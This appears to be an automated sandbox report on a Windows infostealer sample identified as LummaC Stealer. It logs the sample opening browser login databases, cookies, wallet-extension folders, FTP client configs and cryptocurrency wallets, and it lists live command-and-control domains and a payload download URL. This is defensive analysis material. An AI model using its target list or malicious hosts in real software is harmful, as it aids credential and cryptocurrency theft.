Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Directory queried: C:\Users\user\Documents\NIRMEKAMZH	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Directory queried: C:\Users\user\Documents\NIRMEKAMZH	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Directory queried: C:\Users\user\Documents\SNIPGPPREP	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Directory queried: C:\Users\user\Documents\SNIPGPPREP	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Directory queried: C:\Users\user\Documents\UBVUNTSCZJ	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Directory queried: C:\Users\user\Documents\UBVUNTSCZJ	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Directory queried: C:\Users\user\Documents\WHZAGPPPLA	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Directory queried: C:\Users\user\Documents\WHZAGPPPLA	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Directory queried: C:\Users\user\Documents\PWZOQIFCAN	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Directory queried: C:\Users\user\Documents\PWZOQIFCAN	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Directory queried: C:\Users\user\Documents\SNIPGPPREP	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Directory queried: C:\Users\user\Documents\SNIPGPPREP	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Directory queried: C:\Users\user\Documents\UBVUNTSCZJ	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Directory queried: C:\Users\user\Documents\UBVUNTSCZJ	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Directory queried: C:\Users\user\Documents\WHZAGPPPLA	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Directory queried: C:\Users\user\Documents\WHZAGPPPLA	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Directory queried: C:\Users\user\Documents\SNIPGPPREP	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Directory queried: C:\Users\user\Documents\SNIPGPPREP	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Directory queried: C:\Users\user\Documents\QFAPOWPAFG	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Directory queried: C:\Users\user\Documents\QFAPOWPAFG	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Directory queried: C:\Users\user\Documents\SNIPGPPREP	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Directory queried: C:\Users\user\Documents\SNIPGPPREP	Jump to behavior

Source: Yara match

File source: Process Memory Space: rwFNJ4pHWG.exe PID: 7704, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: rwFNJ4pHWG.exe PID: 7704, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	12 Process Injection	44 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 Query Registry	Remote Services	31 Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	12 Process Injection	LSASS Memory	851 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	11 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	44 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Obfuscated Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	223 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
rwFNJ4pHWG.exe	51%	Virustotal		Browse
rwFNJ4pHWG.exe	55%	ReversingLabs	Win32.Infostealer.Tinba
rwFNJ4pHWG.exe	100%	Avira	TR/Crypt.TPM.Gen
rwFNJ4pHWG.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
scentniej.buzz	0%	Avira URL Cloud	safe
https://mindhandru.buzz/pi	0%	Avira URL Cloud	safe
https://mindhandru.buzz/$	0%	Avira URL Cloud	safe
https://mindhandru.buzz/api$	0%	Avira URL Cloud	safe
https://mindhandru.buzz:443/api	100%	Avira URL Cloud	malware
hummskitnj.buzz	0%	Avira URL Cloud	safe
https://mindhandru.buzz/api	100%	Avira URL Cloud	malware
https://mindhandru.buzz/M8	0%	Avira URL Cloud	safe
http://185.215.113.16/off/def.exeat	0%	Avira URL Cloud	safe
mindhandru.buzz	0%	Avira URL Cloud	safe
http://185.215.113.16/off/def.exeeWebKit/537.36	0%	Avira URL Cloud	safe
https://mindhandru.buzz/apib	0%	Avira URL Cloud	safe
https://mindhandru.buzz/	0%	Avira URL Cloud	safe
rebuildeso.buzz	0%	Avira URL Cloud	safe
screwamusresz.buzz	0%	Avira URL Cloud	safe
cashfuzysao.buzz	0%	Avira URL Cloud	safe
appliacnesot.buzz	0%	Avira URL Cloud	safe
inherineau.buzz	0%	Avira URL Cloud	safe
https://mindhandru.buzz/1j8	0%	Avira URL Cloud	safe
https://mindhandru.buzz//KqK	0%	Avira URL Cloud	safe
https://mindhandru.buzz/apiAVOh	0%	Avira URL Cloud	safe
prisonyfork.buzz	0%	Avira URL Cloud	safe
https://mindhandru.buzz/cAEyLoeGMXY4h2NuERROx;	0%	Avira URL Cloud	safe
http://185.215.113.16/off/def.exezen	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.google.com	172.217.21.36	true	false	high
s-part-0035.t-0009.t-msedge.net	13.107.246.63	true	false	high
mindhandru.buzz	172.67.165.185	true	false	high
js.monitor.azure.com	unknown	unknown	false	high
mdec.nelreports.net	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
scentniej.buzz	true	Avira URL Cloud: safe	unknown
hummskitnj.buzz	true	Avira URL Cloud: safe	unknown
mindhandru.buzz	true	Avira URL Cloud: safe	unknown
https://mindhandru.buzz/api	true	Avira URL Cloud: malware	unknown
rebuildeso.buzz	true	Avira URL Cloud: safe	unknown
appliacnesot.buzz	true	Avira URL Cloud: safe	unknown
screwamusresz.buzz	true	Avira URL Cloud: safe	unknown
cashfuzysao.buzz	true	Avira URL Cloud: safe	unknown
inherineau.buzz	true	Avira URL Cloud: safe	unknown
prisonyfork.buzz	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf	chromecache_78.6.dr	false		high
https://duckduckgo.com/chrome_newtab	rwFNJ4pHWG.exe, 00000000.00000003.1411535365.0000000005AFD000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1411399139.0000000005B00000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	rwFNJ4pHWG.exe, 00000000.00000003.1411535365.0000000005AFD000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1411399139.0000000005B00000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/	chromecache_78.6.dr	false		high
https://mindhandru.buzz/api$	rwFNJ4pHWG.exe, 00000000.00000003.1462684340.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1462939932.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1464080388.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1462409131.0000000005ABD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.16/off/def.exeP	rwFNJ4pHWG.exe, 00000000.00000003.1655501714.0000000001267000.00000004.00000020.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000002.1731552437.000000000123F000.00000004.00000020.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1655632997.0000000001269000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.linkedin.com/cws/share?url=$	chromecache_92.6.dr, chromecache_112.6.dr	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	rwFNJ4pHWG.exe, 00000000.00000003.1411399139.0000000005B00000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Youssef1313	chromecache_78.6.dr	false		high
https://mindhandru.buzz/pi	rwFNJ4pHWG.exe, 00000000.00000003.1516391330.000000000128C000.00000004.00000020.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1530418764.000000000128C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.16/off/def.exeat	rwFNJ4pHWG.exe, 00000000.00000003.1655501714.0000000001267000.00000004.00000020.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1655632997.0000000001269000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0	chromecache_92.6.dr, chromecache_112.6.dr	false		high
https://aka.ms/msignite_docs_banner	chromecache_92.6.dr, chromecache_112.6.dr	false		high
